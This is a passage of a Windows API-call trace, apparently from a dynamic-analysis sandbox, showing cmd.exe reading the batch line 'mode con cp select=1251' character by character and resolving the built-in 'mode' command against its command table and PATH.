lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.804] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.805] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0244.805] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.805] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.806] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0244.806] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.806] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.806] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0244.806] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.806] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.806] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0244.806] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.806] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.806] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0244.806] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.806] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.806] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0244.806] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.806] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.806] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0244.807] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.807] GetFileType (hFile=0xe8) returned 0x3 [0244.807] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.807] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.807] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.807] GetFileType (hFile=0xf4) returned 0x3 [0244.807] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.807] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0244.807] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x25fa38, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fa38*=0x18, lpOverlapped=0x0) returned 1 [0244.807] GetProcessHeap () returned 0x370000 [0244.807] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4012) returned 0x38b310 [0244.807] GetProcessHeap () returned 0x370000 [0244.807] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b310 | out: hHeap=0x370000) returned 1 [0244.807] _wcsicmp (_String1="mode", _String2=")") returned 68 [0244.807] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0244.807] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0244.807] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0244.807] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0244.807] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0244.807] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0244.808] GetProcessHeap () returned 0x370000 [0244.808] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb0) returned 0x389840 [0244.808] GetProcessHeap () returned 0x370000 [0244.808] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1a) returned 0x384630 [0244.808] GetProcessHeap () returned 0x370000 [0244.808] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x38) returned 0x386550 [0244.809] GetConsoleOutputCP () returned 0x1b5 [0244.809] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0244.809] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0244.809] GetConsoleTitleW (in: lpConsoleTitle=0x25f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.809] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0244.809] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0244.810] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0244.810] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0244.810] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0244.810] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0244.810] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0244.810] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0244.810] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0244.810] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0244.810] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0244.810] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0244.810] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0244.810] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0244.810] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0244.810] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0244.810] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0244.810] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0244.810] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0244.810] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0244.810] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0244.810] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0244.810] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0244.810] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0244.810] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0244.810] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0244.810] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0244.810] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0244.810] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0244.810] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0244.810] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0244.810] _wcsicmp (_String1="mode", _String2="START") returned -6 [0244.810] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0244.810] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0244.810] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0244.810] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0244.811] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0244.811] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0244.811] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0244.811] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0244.811] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0244.811] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0244.811] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0244.811] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0244.811] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0244.811] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0244.811] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0244.811] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0244.811] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0244.811] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0244.811] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0244.811] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0244.811] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0244.811] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0244.811] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0244.811] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0244.811] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0244.811] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0244.811] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0244.811] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0244.811] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0244.811] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0244.811] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0244.811] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0244.811] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0244.811] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0244.811] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0244.811] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0244.811] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0244.812] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0244.812] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0244.812] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0244.812] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0244.812] _wcsicmp (_String1="mode", _String2="START") returned -6 [0244.812] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0244.812] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0244.812] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0244.812] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0244.812] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0244.812] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0244.812] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0244.812] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0244.812] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0244.812] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0244.812] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0244.812] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0244.812] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0244.812] GetProcessHeap () returned 0x370000 [0244.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x218) returned 0x38aae0 [0244.812] GetProcessHeap () returned 0x370000 [0244.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x42) returned 0x389900 [0244.812] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0244.815] GetProcessHeap () returned 0x370000 [0244.815] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x420) returned 0x38b310 [0244.815] SetErrorMode (uMode=0x0) returned 0x0 [0244.815] SetErrorMode (uMode=0x1) returned 0x0 [0244.815] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x38b320, lpFilePart=0x25f280 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x25f280*="system32") returned 0x13 [0244.815] SetErrorMode (uMode=0x0) returned 0x1 [0244.815] GetProcessHeap () returned 0x370000 [0244.815] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x38b310, Size=0x42) returned 0x38b310 [0244.815] GetProcessHeap () returned 0x370000 [0244.815] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b310) returned 0x42 [0244.815] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0244.815] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0244.815] GetProcessHeap () returned 0x370000 [0244.815] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x104) returned 0x385bb0 [0244.815] GetProcessHeap () returned 0x370000 [0244.815] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1f8) returned 0x389c60 [0244.821] GetProcessHeap () returned 0x370000 [0244.821] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x389c60, Size=0x106) returned 0x389c60 [0244.821] GetProcessHeap () returned 0x370000 [0244.821] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x389c60) returned 0x106 [0244.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0244.821] GetProcessHeap () returned 0x370000 [0244.821] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe8) returned 0x389d80 [0244.821] GetProcessHeap () returned 0x370000 [0244.821] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x389d80, Size=0x7e) returned 0x389d80 [0244.821] GetProcessHeap () returned 0x370000 [0244.821] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x389d80) returned 0x7e [0244.822] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.822] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x25eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 